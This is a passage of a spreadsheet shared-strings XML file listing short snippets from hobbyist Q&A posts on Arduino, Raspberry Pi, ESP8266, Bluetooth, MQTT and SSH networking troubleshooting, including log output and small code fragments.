    <t>think that the DataWriter is sending the data not in the right order and the fingerprint sensor is not respoing right.</t>
  </si>
  <si>
    <t>I am able to send the key from the mobile and turn on the LED on the Arduino.</t>
  </si>
  <si>
    <t>Port forwarding would only be necessary if something outside you network wants to open a connection to something inside.</t>
  </si>
  <si>
    <t>Another route would be to sniff the connection with wireshark.</t>
  </si>
  <si>
    <t>But blocking to wait for email confirmation can take forever.</t>
  </si>
  <si>
    <t xml:space="preserve">
Under Network Options you will find the WiFi setup.</t>
  </si>
  <si>
    <t>debug1: Found key in /home/userBackup/.ssh/known_hosts:2
Warning: Permanently added the ECDSA host key for IP address '[90.10.1.1]:4444' to the list of known hosts.</t>
  </si>
  <si>
    <t>in the serial terminal send the following AT Commands
this should reply with something like
then set this mac to be whitelisted
AT+AD07ED33C16D201
AT+ALLO1
AT+RESET
To turn off whitelisting if something goes wrong do the following
AT+ALLO0
AT+RESET
I would suggest reading the HM Bluetooth Datasheet.</t>
  </si>
  <si>
    <t>When i create a ssh tunnel to my raspberry MobaXterm ask me to login to the raspberry, it process and then i receive this answer :
thank for your answer</t>
  </si>
  <si>
    <t>When a connection is established, the app sends an encrypted XML string to the RPi.</t>
  </si>
  <si>
    <t>the barcode scanner is connected to serial port and keypad and printer  are  connected via software serial.</t>
  </si>
  <si>
    <t>All the devices are properly configured and have joined the network, but the packet is not being received.</t>
  </si>
  <si>
    <t>Using MAC address to get to the Arduino but this is insufficient approach because the MAC addresses are hard coded in Arduino, and then spoofing may occurs.</t>
  </si>
  <si>
    <t>It logs as warning "websocket connection invalid" and ends the connection.</t>
  </si>
  <si>
    <t>It will light an LED in the Arduino if the data sent from Android is recognized.</t>
  </si>
  <si>
    <t>I have port-forwarded to port 8080, and allowed for that port in my firewall.</t>
  </si>
  <si>
    <t>Here is the code I use: 
When I use this setup for outdoor sensors anyone can grab the ESP8266, read the Lua script and get my WiFi password.</t>
  </si>
  <si>
    <t>I have looked at the packets with wire shark and what I see is:
TCP 74  33226 &gt; secure-mqtt [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=81898578 TSecr=0 WS=128
Then two more packets going out the same with retransmission.</t>
  </si>
  <si>
    <t>The code below works however I've been told that it's unsafe because sometimes the connection will be broken and the command won't be received entirely.</t>
  </si>
  <si>
    <t>How can you establish a TLS connection just by using/sending a auth token?</t>
  </si>
  <si>
    <t>Within my ESC class, I need to initialise the PWM pins and wait around 5s for the ESCs to validate, before sending any other throttle values to them.</t>
  </si>
  <si>
    <t>Is there a way to make an initial connection to setup a network from the smartphone to a headless raspberry?</t>
  </si>
  <si>
    <t>Ethernet shield is faulty
Below is my code
Additionally, the arduino does have a static IP, so I'm pretty sure it is not an issue of DHCP lease expiry.</t>
  </si>
  <si>
    <t>This "ETHERNET METER MACHINE" only sends data to the particular IP address in form of IP packets.</t>
  </si>
  <si>
    <t>These Pi devices boot up into the terminal and establish a telnet connection with the server.</t>
  </si>
  <si>
    <t>I have successfully established the internet connection but when I go to connect with the server it does not respond.</t>
  </si>
  <si>
    <t>The bytes 00023030303... is sniffed packets that have been sent between a client and server (1 to 100).</t>
  </si>
  <si>
    <t>It simply has to send data to address shifted by 'mask' eg.</t>
  </si>
  <si>
    <t>Connection is established and also when I try to send the messages from the demo devices registered in Hono to Ditto.</t>
  </si>
  <si>
    <t>I would use something like twisted which has a non-blocking mechanism for receiving data via the serial, port.</t>
  </si>
  <si>
    <t>The source address 64 bits is 00:13:A2:00:40:79:E6:5F
The source address 16 bits is DF:13
The packed was acknowledged (0x01)</t>
  </si>
  <si>
    <t>After that I'd verify it with a simple "LED blinking" application on a GPIO.</t>
  </si>
  <si>
    <t>As in, are they making a secure mechanical and electrical connection with the LCD and with the pins on the Arduino.</t>
  </si>
  <si>
    <t>They should be connected to the same router/switch, they should have the same netmask and gateway, but the last number of the IP address has to be different.</t>
  </si>
  <si>
    <t>I've had my connection appear to drop and have been unable to SSH back in using the IP address.</t>
  </si>
  <si>
    <t>But you will get NAKED Lua if you do so... No nifty libraries to control Wifi, serial, SD, ports... You would have to provide that in C, or use NodeMCU code as you need.</t>
  </si>
  <si>
    <t>You did not add any sensor pin in setup() function.</t>
  </si>
  <si>
    <t>One is the connection string, which will enable the module to connect to IoTHub, but we have a server certificate on the edgeHub to establish a connection to the edgeHub.</t>
  </si>
  <si>
    <t>The port mapped to the application (port #6000) seem to be reserved and not considered safe.</t>
  </si>
  <si>
    <t>To establish a connection with AWS you must need a secured connection (https TLS 1.2) but the SIM900 firmware only provide TLS 1.0 (see the doc here : https://simcom.ee/documents/SIM900/SIM900_HTTPS%20AT%20Command%20Set_V1%2000.pdf)
I think I see somebody with the same configuration than yours (Arduino + sim900) who used a lib to connect to AWS.</t>
  </si>
  <si>
    <t>See Also
Wikipedia Article on Packet Analyzers
The term packet sniffer is also common and can be considered a synonym.</t>
  </si>
  <si>
    <t>A WebSocket server by itself doesn't do anything except establish socket connections though HTTP.</t>
  </si>
  <si>
    <t>The second one is a not connected pin, that is reserved for future purposes.</t>
  </si>
  <si>
    <t>Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host.</t>
  </si>
  <si>
    <t>You can have a look at it here
Problem is when I make my Arduino call this file, it reads everything &amp; this is what I end up getting
My Arduino code is given below:-
And this is my PHP code
&lt;?php 
    $server = "mysql.hostinger.in";
    $user = "xxxxxxxxxx";
    $password = "xxxxxx";
    $db = "xxxxxxx";
    $lck;
    $ign;
    $conn = mysqli_connect($server,$user,$password,$db);
    if($conn-&gt;connect_error)
    {
        die("Connection Failed:" .</t>
  </si>
  <si>
    <t>I was thinking of providing it with a configuration server through a dhcp option (option codes 224 through 255 are reserved for private use)
I cannot find any information on how to retrive specific dhcp options using ethercard.h and ENC28J60 board anywhere in the documentation.</t>
  </si>
  <si>
    <t>Created new TCP socket 35 for connection
libEGL warning: DRI2: failed to authenticate
libEGL warning: DRI2: failed to authenticate
[00007fd9b800df20] main decoder error: buffer deadlock prevented</t>
  </si>
  <si>
    <t>Ideally, I'd like some kind of built-in USB hardware channel (like controlling the Scroll Lock keyboard LED) that can be hijacked to pass data, but if push came to shove, being able to send data from the browser to an external client program would work (although I expect browser sandboxing to make that a difficult proposition...).</t>
  </si>
  <si>
    <t>And here's maybe a thing that can help : The pi has the red light constantly ON while the green one blinks following that pattern : on for 8s, off for 0.5s
For information, my program is written in C, it opens an USB port (it is a barcode scanner) and does nothing about shutdown or reboot the machine.</t>
  </si>
  <si>
    <t>The steps I took on the Raspberry to achieve the connection are:
This establishes the Bluetooth connection between the smartphone and the Raspberry.</t>
  </si>
  <si>
    <t>When i try to connect without credential connection fails as expected and program continues.</t>
  </si>
  <si>
    <t>You can check if you have any jumper wires plugged into pin 0 and 1. thoses pins are used for serial communication and plugged wires can can prevent the code from being uploaded on the board.</t>
  </si>
  <si>
    <t>This is what my Serial Monitor shows when I deleted the line: #define FTPWRITE
And this when the line is included: #define FTPWRITE
SD opened
Command connected
220 FileZilla Server 0.9.60 beta
331 Password required for kalenderdisplay
230 Logged on
215 UNIX emulated by FileZilla
200 Type set to I
227 Entering Passive Mode (x,x,x,x,217,107)
Data port: 55659
Data connected
150 Opening data channel for file upload to server of "/Meeting.txt"
Writing
Data disconnected
226 Successfully transferred "/Meeting.txt"
221 Goodbye
Command disconnected
SD closed
FTP OK
That's my Code which I'm using
#include &lt;SD.h&gt;
#include &lt;SPI.h&gt;
#include &lt;ESP8266WiFi.h&gt;
// comment out next line to write to SD from FTP server
#define FTPWRITE
#define STASSID "xxx"
#define STAPSK  "xxx"
const char* ssid     = STASSID;
const char* password = STAPSK;
// change to your server
IPAddress server( x, x, x, x );
WiFiClient client;
WiFiClient dclient;
char outBuf[128];
char outCount;
// change fileName to your file (8.3 format!)</t>
  </si>
  <si>
    <t>Jan 15 12:14:22 raspberrypi bluetoothd[524]: Exit
Jan 15 12:14:22 raspberrypi systemd[1]: Stopping watchdog daemon...
Jan 15 12:14:22 raspberrypi systemd[1]: Stopping Save/Restore Sound Card State...
Jan 15 12:14:22 raspberrypi systemd[1]: Unmounting RPC Pipe File System...
Jan 15 12:14:22 raspberrypi systemd[1]: Stopping Authorization Manager...
Jan 15 12:14:22 raspberrypi systemd[1]: Stopped Daily Cleanup of Temporary Directories.</t>
  </si>
  <si>
    <t>This is done by intercepting most packets, regardless of address or port, until the user opens a browser and tries to access the web.</t>
  </si>
  <si>
    <t>The time it stays up has increased since I installed fail2ban and hardened the ssh login to ban failed attempts.</t>
  </si>
  <si>
    <t>I want to include a database into the Arduino so that when I send login information from my cellphone, the Arduino will check the database and if the login information matches, it retrieves some data from the database and sends it to my cellphone.</t>
  </si>
  <si>
    <t>For HID mode you should do following from cool term
$$$ (CR)
S~,6 (CR)
R,1 (CR)
$$$
Now the red led should be blinking very fast, connect your phone and from cool term send A (carriage return) you should be receiving it directly on your phone.</t>
  </si>
  <si>
    <t>In your bluetooth module you must have an enable pin, check where it is connected if it is connected to HIGH the module is in AT command mode.</t>
  </si>
  <si>
    <t>If you want to restrict the whole broker to only listen for local connections use the  config option to change the default listener to only listen on 127.0.0.1 rather than 0.0.0.0 (this address represents ALL network interfaces on the machine)
If password based authentication is configured it applies to ALL listeners so if you set up a localhost only listener you will still need to supply a username and password.</t>
  </si>
  <si>
    <t>I've tried toggling the output pins to low and high using assembly (from C++ application)
KINO-DH310 recommended assembly: Digital Output is 1001b
My C++ Code:
This always generates an access violation because you could potentially access memory that would harm the system.</t>
  </si>
  <si>
    <t>A common way to solve this is to get a public IP address (or use dynamic DNS for DHCP assigned addresses) for your internet connection and then configure "port forwarding" on your internet router.</t>
  </si>
  <si>
    <t>Command disconnected
    SD closed
    FTP FAIL
    SD opened
    Command connected
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 53 of 200 allowed.</t>
  </si>
  <si>
    <t>**
avrdude: initialization failed, rc=-1
         Double check connections and try again, or use -F to override
         this check.</t>
  </si>
  <si>
    <t>One that accepts the input, parses and checks for erroneousness/malevolent input, and creates the needed output for the printer.</t>
  </si>
  <si>
    <t>I have a Raspberry pi connected to a cell modem and am looking for a way to check if a single port on a public IP is open or closed using the least amount of data possible.</t>
  </si>
  <si>
    <t>Although just to double check, connect to your router (usually 192.168.0.1 - if not ipconfig on your machine, then go to your default gateway), login, go to devices and look for the mac address from your pi (b8:27:eb:63:40:b8) You can check the Local IP address from there...</t>
  </si>
  <si>
    <t>However, by default wifi.sta.config uses auto connect=true in which case the WiFi registration process starts before the event monitor is started.</t>
  </si>
  <si>
    <t xml:space="preserve">
RFC 3696 gives specific advice on validating Internet identifiers, including email addresses.</t>
  </si>
  <si>
    <t>Check your Ip address properly.</t>
  </si>
  <si>
    <t>I found a way to be sure that the UUID is found on the device.</t>
  </si>
  <si>
    <t>When I check the sync servers using the following command, I do receive a ping back so it's not a case of the servers not responding, or a firewall issue:
I'm at a loss as to how to correct this.</t>
  </si>
  <si>
    <t>I have recently started using tmux with my raspberry pi and have set it up to open my session when I start SSH from my pc but when I restart my PI it closes the session and I lose my Pane setup.</t>
  </si>
  <si>
    <t>I just jailbreaked and unlocked my original iPhone(with ios 3.1.3) and trying to open /dev/tty.iap to communicate with a device i made and send characters(for example) via serial port.</t>
  </si>
  <si>
    <t>The ability to
  change the "PWR" LED pin to an output, bypasses the under-voltage detection, which is permitted but
  not recommended.</t>
  </si>
  <si>
    <t>For your use case you can probably set the alarm to breach when it's missing data points because that'll mean your laptop has stopped sending messages.</t>
  </si>
  <si>
    <t>You need to check if you are already connected and registered to the network (CREG status).</t>
  </si>
  <si>
    <t>Is the USB port properly detected as a COM port?</t>
  </si>
  <si>
    <t>As luck would have it Paul Stoffregen ported the library so it can work on any linux type system using any Arduino board
(Arduino Code) https://github.com/PaulStoffregen/Bridge
(Python Code for the linux side) https://github.com/PaulStoffregen/BridgeUSB
So what it does is you set-up the Pi so when you connect the Arduino it will auto login on the comm port as root (via the usb connection) and then it should start the Bridge.py script.</t>
  </si>
  <si>
    <t>In order to prevent users from hijacking pins occupied by the peripherals, I need to prevent user from export, unexport, change of direction and value of pins used by peripherals.</t>
  </si>
  <si>
    <t>{ send "yes\r"; exp_continue }
    "password:"  { send "root\r" }
}
expect eof
That form of the expect command allows you to look for multiple strings simultaneously.</t>
  </si>
  <si>
    <t>If you want to find out what IP Address was assigned to the shield by the WiFi Router then you can go about it in two ways:
Log onto your WiFi Router and see if it contains a DHCP clients
list.</t>
  </si>
  <si>
    <t>(If there was a way to make sure the email your program sends is delivered to the recipient, spammers would promptly start doing that, mail server administrators would prompty respond, and then it would no longer work.)</t>
  </si>
  <si>
    <t>I've successfully created the server and also logged into phpmyadmin, Now, i'm creating a database in phpmyadmin, and getting this error,
mysqli_real_connect():(HY000/1045): Access denied for user 'phpmyadmin'@'localhost' (using password: YES)
&amp;
Connection for controluser as defined in your configuration failed
Please give me a sloution, doing this for my FYP and really new to this
I've created phpmyadmin, when i was downloading it on raspberry terminal, it did give me an error, at first i retried it but then I ignored it and continued and now I think it's now link it with wordpress
I expected for it to create a database through phpmyadmin for wordpress.</t>
  </si>
  <si>
    <t>I want to encrypt the parameter values and decrypt them in my PHP code And vice versa (my server sends back JSON data to my esp32).</t>
  </si>
  <si>
    <t>I am connecting Raspberry Pi Zero to the GT-511C3 fingerprint scanner, and after getting it to respond, I constantly receive the same error code.</t>
  </si>
  <si>
    <t>However, all off-the-shelf fingerprint sensors only support a maximum of around 100 fingerprints on the device flash itself.</t>
  </si>
  <si>
    <t>If the SSID is not valid or the passkey to the SSID is incorrect, it tells me that it is DISCONNECTED.</t>
  </si>
  <si>
    <t>However, after a device has been connected and then disconnected web bluetooth fails to see the device again.</t>
  </si>
  <si>
    <t>The last step that you need to do is match the fingerprints with an x,y coordinate on your map.</t>
  </si>
  <si>
    <t>I have found the following:
Using VNC, login to Gnome desktop as myself and run application as myself, works 100%
While logged into desktop as myself, run xhost +
Sudo switch user to another user and the application fails
As the new user, export DISPLAY=hostname:
Run the app and now it works 100%
This started happening with a python update which included newer versions of pyqt and libqt.</t>
  </si>
  <si>
    <t>After detection, the Arduino BT board must send serial data back to an Android phone via Bluetooth.</t>
  </si>
  <si>
    <t>AT+CREG?+CREG: 0,1
    AT+CGSOCKCONT=1,"IP","internet" OK
    AT+CSOCKAUTH=1,1,"" "" OK
    AT + NETOPEN = "TCP", 60000 ERROR
I suspect there is a connection with this not working and me only receiving AT commands.</t>
  </si>
  <si>
    <t>mybuffer += Encoding.ASCII.GetString(received, 0, bytesRead);
                 }
I have invoked this method just after the login credentials...Still have no luck in receiving the data ...</t>
  </si>
  <si>
    <t>Problem 1: The problem is that it sends this notification before the OpenVPN connection is established.</t>
  </si>
  <si>
    <t>I'm trying to initiate a TLS handshake using an ESP8266 over TCP, but the server I'm sending the packet to keeps returning a TLS decode error (code 50).</t>
  </si>
  <si>
    <t>When I try to send a SMS I got an error:
Im obviously connected to the network because pin is entered +CREG an +COPS seems good.</t>
  </si>
  <si>
    <t>The green LED for ACT is solid green during this lock up and blinking during normal use.</t>
  </si>
  <si>
    <t>For reference, I'm trying to use this as part of a 2-way handshake with a node.js server that doesn't get messed up when other Arduinos are also attempting to handshake or are already connected and sending data.</t>
  </si>
  <si>
    <t>For instance, if I wanted to switch on an LED light, when the Ethereum transaction has successfully taken place.</t>
  </si>
  <si>
    <t>The topic is not valid: use-token-auth 
The topic does not match an allowed rule    07.02.2017 11:58:16
Closed connection from 93.231.145.115.</t>
  </si>
  <si>
    <t>The topic is not valid: use-token-auth 
The topic does not match an allowed rule    07.02.2017 11:56:03
Closed connection from 93.231.145.115.</t>
  </si>
  <si>
    <t>How do I set it so once triggered it stays on until say a button push is detected to disarm it?</t>
  </si>
  <si>
    <t>All I'm getting back is:
Sample Code (connection strings and keys masked)
Am I doing something wrong here?</t>
  </si>
  <si>
    <t>I can connect but I can't get access to the txCharacteristic
This code works, but only discovers the following UUIDs:
I have figured out that these UUID's are DFU UUIDs.</t>
  </si>
  <si>
    <t>Lets say I have a device with a private ip address and I want to send some data to it by via a web socket connection.</t>
  </si>
  <si>
    <t>(unexpected_token at [all_tests_here1] lib\main.dart:15)
I want to send all the sensor data(2 sensors) using wifi to the firebase, and then get it to the flutter app.</t>
  </si>
  <si>
    <t>We would have rather used MAC addresses over IP addresses as it probably is more secure, but MAC addresses are probably harder to manage.</t>
  </si>
  <si>
    <t>I also found that the failure is caused by mismatch of cached server certificate and actual host name.</t>
  </si>
  <si>
    <t>Additionally, whenever I get a packet with corrupted data, the following packet is dropped entirely.</t>
  </si>
  <si>
    <t>First, you should enable the digit through the common pin only after your output is ready.</t>
  </si>
  <si>
    <t>Using the default of 9600 bps is inefficient and increases the time it will take for a host to acknowledge packets.</t>
  </si>
  <si>
    <t>The IP address order: client IP, subnet mask, and gateway IP.</t>
  </si>
  <si>
    <t>The srv:listen() in auth.lua no longer gets called because they are both on port 80, so the newer listen() takes over instead.</t>
  </si>
  <si>
    <t>It seems something broke with Espressif SDK upgrade 2.0 wrt establishing secure HTTP connections.</t>
  </si>
  <si>
    <t>You should also send User-Agent and Connection: close to be a good HTTP citizen.</t>
  </si>
  <si>
    <t>When you send a message directly from the arduino, it is not possible to mask your number.</t>
  </si>
  <si>
    <t>for the mclient you need to pass also the useSSL flag to "true" as you requested the connection over secure port (8883).</t>
  </si>
  <si>
    <t>* AppEUI (like a group of devices, the sensor will connect to it)
 * AppKey (Encryption key)
If those 4 things are match then your device should be able to connect.</t>
  </si>
  <si>
    <t>Messages are also sent in a unsolicited fashion from a Remote NDIS device to the host.</t>
  </si>
  <si>
    <t>For example:
Example Output
$ ./bin/uuid_to_uint8_t
 original: 3bdb098f-b8b0-4d1b-baa2-0d93eb7169c4
 unsigned: 3bdb098fb8b04d1bbaa20d93eb7169c4
(note: you can add a further check that uuid[ui] is a valid hexadecimal character or '-' before attempting the conversion for additional validation).</t>
  </si>
  <si>
    <t>Queued non-blocking send and receive operations, with optional timeouts.</t>
  </si>
  <si>
    <t>By finding ports which are unsecured ("open") port scanning can be used to identify security vulnerabilities on a system.</t>
  </si>
  <si>
    <t>Thank you for your help
I'm getting the following output: 
Last login: Sun Jun 25 16:33:22 on ttys000
Annas-MacBook-Air:~ annazotova$ ssh -v pi@192.168.0.3
OpenSSH_7.3p1, LibreSSL 2.4.1
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 20: Applying options for *
debug1: /etc/ssh/ssh_config line 102: Applying options for *
debug1: Connecting to 192.168.0.3 [192.168.0.3] port 22.
debug1: Connection established.</t>
  </si>
  <si>
    <t>The pipe is created with the appropriate permissions, but netcat fails to establish an open 777/tcp  open  multiling-http.</t>
  </si>
  <si>
    <t>You could set up port forwarding so that the default port 22 would be your raspberry pi, but connecting to port 2200 would forward to an ssh server on your desktop.</t>
  </si>
  <si>
    <t>Waiting for card...
Card found
Card found
Card not valid
Nov 27, 2013 1:02:01 PM livaccess.AccessTerminal run
SEVERE: null
javax.smartcardio.CardNotPresentException: No card present
    at sun.security.smartcardio.TerminalImpl.connect(TerminalImpl.java:82)
    at livaccess.AccessTerminal.run(AccessTerminal.java:41)
    at java.lang.Thread.run(Thread.java:722)
Caused by: sun.security.smartcardio.PCSCException: SCARD_W_REMOVED_CARD
    at sun.security.smartcardio.PCSC.SCardStatus(Native Method)
    at sun.security.smartcardio.CardImpl.&lt;init&gt;(CardImpl.java:85)
    at sun.security.smartcardio.TerminalImpl.connect(TerminalImpl.java:78)
    ... 2 more
If I do exactly the same program with the same setup on a windows machine I get the following output:
Starting system...</t>
  </si>
  <si>
    <t>The main question is how to put together these two scripts in order to make the pir sensor wait until it's dark (value from the LDR) to start driving a LED to turn on or off when it detects/does not detect a person.</t>
  </si>
  <si>
    <t>Use define for pin, they won't be updated during the run
I have choose to send the id of pin  or 1, if you want the pin number you can simply change the call to postData
Use static val to store previous switch state and detect press on switch.</t>
  </si>
  <si>
    <t>What I want to do is use the other GPIO pin to trigger an alarm for 2 seconds, and then set the state of the first GPIO pin to high, therefore opening the door.</t>
  </si>
  <si>
    <t>If it is open, you need to check the port forwarding in your internet router (all the incomming traffic at the port 8080 must be directed to IP of your RPi).</t>
  </si>
  <si>
    <t>Given that the AWS IoT supports JavaScript we expect that this is possible ...
We have searched at the AWS IoT Documentation but only found server-side examples (which expose AWS secrets/keys...)
Are there any good working examples or tutorials for using AWS IoT to send/receive messages via WebSockets/MQTT in the browser (e.g: authenticating with AWS Cognito)?</t>
  </si>
  <si>
    <t>Jailbreak iphone 4/4S for serial communication with working mock-up (I found we can't jailbreak iphone5, so convert lightning connector to 30pin)
I need some advices that alternative way above is proper and possible way or not.</t>
  </si>
  <si>
    <t>[EDITED]
On the raspberry pi3, with raspbian installed, I launch the "bluetoothctl" command line, I go on my Android App, I select a file and a bluetooth device which will receive this file, I clic on "SEND" and the following lines appears on my Raspberry Shell :
Of course, both devices are paired and trusted before trying to send the file.</t>
  </si>
  <si>
    <t>Edit
I though apache was working, but after some debug, i thought out that it was lighttpd who was listening on port 80 and not letting Apache access it.</t>
  </si>
  <si>
    <t>I have checked that the arduino si on the same subnet mask as all the other devices in the network.</t>
  </si>
  <si>
    <t>To expand on Milos's answer, you need a way to switch the Arduino between lock/unlock mode and password setup mode.</t>
  </si>
  <si>
    <t>As @juraj mentions, in the Arduino code for ESP32, you cannot initiate a scan while an attempt to connect to AP is already ongoing.</t>
  </si>
  <si>
    <t>The nature of the setup means I have no kb/mouse on the RPi once its in the car, so it needs to be a fully automated setup where anyone can scan for the RPi, and if the probably hard-coded PIN is correct, the trusting of the device needs to be automatically done, no cli input.</t>
  </si>
  <si>
    <t>Just choosing my key from options, click OK, the connection window blinks and nothing happens
EDIT:
Just for an experiment I generated a new key on Raspberry and added it to bitbucket - that worked.</t>
  </si>
  <si>
    <t>If you want to send data to somebody on the Internet you have to find out their IP address.</t>
  </si>
  <si>
    <t>If you fix that, you should see the actual password in debug output, and you can then working on getting the server sending an accept.</t>
  </si>
  <si>
    <t>You need to get an 802.15.4 packet sniffer to monitor the 802.15.4 network traffic.</t>
  </si>
  <si>
    <t>If you edit user files with sudo you can screw up your file permissions, which leads to very strange bugs.</t>
  </si>
  <si>
    <t>I found the Answer,
So the issue was caused by the mysql user not having permissions to use the GPIO pins.</t>
  </si>
  <si>
    <t>You need to configure your pin sometimes as an input, sometimes as an output.</t>
  </si>
  <si>
    <t>that way you will never send a plain X
Now you can start every message withe a completely unique identifier, X
the receiver can now wait for a X, and start collecting bytes.</t>
  </si>
  <si>
    <t>The thing is, the app needs to be able to detect the Xbee device and if not connected, wait for it to be connected - indefinitely (or until closed).</t>
  </si>
  <si>
    <t>The problem now is, that I check the registration status with  which is always +CREG: 1,0 which means.</t>
  </si>
  <si>
    <t>Is the Arduino's serial buffer getting corrupted by the WriteData function somehow?</t>
  </si>
  <si>
    <t>In total I will need to upload firmware, start firmware, check if firmware is running and stop firmware.</t>
  </si>
  <si>
    <t>After SPI is enabled, you will see your device status on Cumulocity is waiting for you to accept the connection.</t>
  </si>
  <si>
    <t>I tried to write in shell but it didn't work 
c=mosquitto_sub -h host_name -p port_no -u remote_user_name -P remote_password  -t hello/today/world
if ( c == "rushabh welcome to garden assistant" )
then
   GPIO mode 12 out
   GPIO mode 12 1
   GPIO mode 12 0
else
   echo "not matched"
fi
Since I want to turn on the led at gpio 12 as soon as I receive rushabh welcome to garden assistant from the mosquitto broker
Can we use $SYS/broker/messages/stored</t>
  </si>
  <si>
    <t>The original Python code looks like this:
My Attempt in C++ looks like this:
Needles to say it doesn't work, Can anyone help with the porting the code, i have tried to miminc the python code and the orgial doument at http://wiki.scratch.mit.edu/wiki/Remote_Sensors_Protocol but have had no success.</t>
  </si>
  <si>
    <t>Uncaught TypeError: Failed to execute 'drawImage' on 'CanvasRenderingContext2D': No function was found that matched the signature provided.</t>
  </si>
  <si>
    <t>It turns out that they are caused by TLS Encrypted Alerts being sent by the broker (seen on Wireshark).</t>
  </si>
  <si>
    <t>The  function just prints for every sector
PCD_Authenticate() failed: Timeout in communication.</t>
  </si>
  <si>
    <t>All my sensors (and the PI) have hardcoded the SSID and pass of my WiFi at home.</t>
  </si>
  <si>
    <t>Now I can't find an easy solution how to send these codes with a python library to the transmitter which are connected to the PINS.</t>
  </si>
  <si>
    <t>I suggest you take a look at the imaplib - it provides tools for accessing email accounts and retrieving emails.</t>
  </si>
  <si>
    <t>If you set the default to no retry, the connection cannot be re-established without interference.</t>
  </si>
  <si>
    <t>Pinning is the process of associating a host with their expected X509 certificate or public key.</t>
  </si>
  <si>
    <t>Once the bytes are sent, the host waits for an acknowledgement which is a simple k character.</t>
  </si>
  <si>
    <t>IEEE 802.15.4 Data, Dst: 0x0002, Src: 0x0001, Bad FCS
Frame Control Field: Data (0x8861)
.... .... .... .001 = Frame Type: Data (0x0001)
.... .... .... 0... = Security Enabled: False
.... .... ...0 .... = Frame Pending: False
.... .... ..1.</t>
  </si>
  <si>
    <t>I don't know if any of my above attempts could have caused my login problems but essentially the only thing I was doing was trying to setup deluge when I stopped being able to login.</t>
  </si>
  <si>
    <t>I have only changed the Software Serial pin numbers and the SSID and password ofcourse in the example.</t>
  </si>
  <si>
    <t>I am thinking of a 'server' solution where a 'client' on the RPi keep an active connection so a SSH connection can be established when required.</t>
  </si>
  <si>
    <t>I have this pretty simple task to light up an LED for 3 seconds when I send the right password from my Android phone to the Arduino via Bluetooth.</t>
  </si>
  <si>
    <t>In the /etc/network/interfaces i set up a static ip for the wifi connection along with the connection name and password.</t>
  </si>
  <si>
    <t>I'm trying to make two functions,
1) asks and receives a number from a serial port between 10 &amp; 170. asks for re-entry if invalid.</t>
  </si>
  <si>
    <t>and i should have that ; at the end because there maybe be some noise and corrupted packets received so i need to determine when the packet is ended.</t>
  </si>
  <si>
    <t>Yesterday everything was OK, today I get the error:
DEP6956 : Failed to establish connection to the device due to protocol incompatibility.</t>
  </si>
  <si>
    <t>The access point is working and I can connect to it, and when I visit 192.168.4.1,  my request is printed to the console so that's all working but Safari on iOS complaining that the server has stopped responding.</t>
  </si>
  <si>
    <t>It was connected successfully with the smartphone but the moment I sent the motor activation command from the phone, HC-05 gets disconnected.</t>
  </si>
  <si>
    <t>I am currently working on a project involving a BlackWidow board that can establish a connection to the server, but cannot transmit data/receive acknowledgement or anything.</t>
  </si>
  <si>
    <t>I have to write an application which has to identify "ESP32" devices &amp; send/receive data from a Windows C++ application.</t>
  </si>
  <si>
    <t>Closing my SSH client is killing the Node.js application (which is fine) but there are certain GPIO cleanup methods that need to happen before it closes.</t>
  </si>
  <si>
    <t>It does enroll correctly, and even receives device operations such as: send ring device, and send message.</t>
  </si>
  <si>
    <t>At one point of my project I have to send some data like Email and Password from android phone to ESP32 connected over BLE.</t>
  </si>
  <si>
    <t>The code is will be used to sniff packages between a specific client and a server with static addresses and specified port.</t>
  </si>
  <si>
    <t>Clicking Validate Connection button, the response is Connection Success.</t>
  </si>
  <si>
    <t>In the processing program for the Arduino I am printing the following to the serial port:
 is a signed int.</t>
  </si>
  <si>
    <t>The sensor
  cannot be addressed by the IC protocol, however, the sensor 
  can be connected to an IC bus without interference with 
  other devices connected to the bus.</t>
  </si>
  <si>
    <t>If you want a more guaranteed solution, look into an Arduino Bluetooth module that supports SPP - Serial Port Profile.</t>
  </si>
  <si>
    <t>Otherwise it seems the router + port is unreachable, possibly due to your firewall setup or network setup.</t>
  </si>
  <si>
    <t>To begin, yes, the Arduino Ethernet is capable to store and send back cookies.</t>
  </si>
  <si>
    <t>This means once the connection is established, it's very hard to hack, but you have to make sure yourself that you're not connected to a malicious user!</t>
  </si>
  <si>
    <t>If you make the raspberry pi a wifi access point, the tablet can connect to the pi, however unless the pi has a connection using ethernet you will have no wifi whatsoever.</t>
  </si>
  <si>
    <t>If you want to make sure that all the packets your RPi is sending out its eth0 interface are not throttled by an upstream (ISP) router/modem, you should QoS the packets going from wlan0 to eth0.</t>
  </si>
  <si>
    <t>Test the connection by pinging or using ssh, for example run the following from the agent with IP address 10.10.2.1:
ssh 10.10.2.2
to access the agent with IP address 10.10.2.2.</t>
  </si>
  <si>
    <t>When executed by an unprivileged user, only SYN packets are sent (using a connect call) to ports 80 and 443 on the target.</t>
  </si>
  <si>
    <t>Why this should work: It seems that your server is not a full telnet server (requiring a login etc) but a socket that waits for a connection, and then returns data.</t>
  </si>
  <si>
    <t>I can't be 100% sure but the most likely cause is this (quote from the docs):
After an IP address has been successfully obtained this module will
  stop as if enduser_setup.stop() had been called.</t>
  </si>
  <si>
    <t>But to be able sniff the packets sent to other devices you will need to do some modifications to disable the automatic response.</t>
  </si>
  <si>
    <t>Remember that 802.15.4 is always 250kbps over the air, and the XBee module's serial port configuration is just for local communications with the host.</t>
  </si>
  <si>
    <t>With the latest version of AndroidThings (DP6) you can setup the Wifi Connection through the launcher (before you install your app).</t>
  </si>
  <si>
    <t>Proxying encrypted connections is also more complicated and requires listening on port 443.</t>
  </si>
  <si>
    <t>And remember that each proxied connection will require an outgoing connection, so proxying even 2 TCP connections will use up 4 of the 5 available.</t>
  </si>
  <si>
    <t>The remote port need not be accessible on the network directly, only ssh ( the game server would listen on localhost).</t>
  </si>
  <si>
    <t>Whenever Pi access internet, you can go to service dashboard to get a temperature host and port to ssh to your Pi.</t>
  </si>
  <si>
    <t>In order to establish a TLS connection, you may need to download and reference the DigiCert Baltimore Root Certificate, and then set the certificate for the TLS/SSL connection.</t>
  </si>
  <si>
    <t>Queued non-blocking send and receive operations, with optional
timeouts.</t>
  </si>
  <si>
    <t>ARP is a protocol for resolution of network layer addresses such as IP into link layer addresses (such as MAC addresses).</t>
  </si>
  <si>
    <t>I am trying to connect to Google's MQTT server but I am getting errors
